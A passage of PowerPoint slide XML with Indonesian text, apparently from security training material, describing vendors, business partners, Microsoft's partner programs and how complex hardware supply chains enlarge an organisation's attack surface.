              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ritel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (B2B) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (B2C). Vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyesuaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Mitra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiratkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selaras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baginya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OEM) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitranya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> motherboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> chip individual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Luasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpapar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, agar motherboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> chip, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OEM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
